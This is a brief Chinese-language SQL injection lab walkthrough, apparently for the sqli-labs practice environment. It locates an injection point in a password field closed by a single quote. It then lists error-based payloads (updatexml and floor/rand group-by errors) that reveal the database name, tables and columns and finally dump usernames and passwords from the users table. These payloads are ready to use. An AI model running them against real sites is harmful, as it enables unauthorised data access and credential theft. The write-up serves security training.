0、初始网页

1、确定闭合字符

注入点在于password框，闭合字符为单引号

2、爆库名

1' and updatexml(1,concat(0x7e,database(),0x7e),1)#

1' and (select 1 from (select count(*),concat((select database()),floor(rand()*2))x from information_schema.tables group by x) as y) #

3、爆表名

1' and (select 1 from (select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand()*2))x from information_schema.tables group by x) as y) #

4、爆列名

1' and (select 1 from (select count(*),concat((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2))x from information_schema.tables group by x) as y) #

5、查询最终结果

1' and (select 1 from (select count(*),concat((select group_concat(username,0x3a,password) from users),floor(rand()*2))x from information_schema.tables group by x) as y) #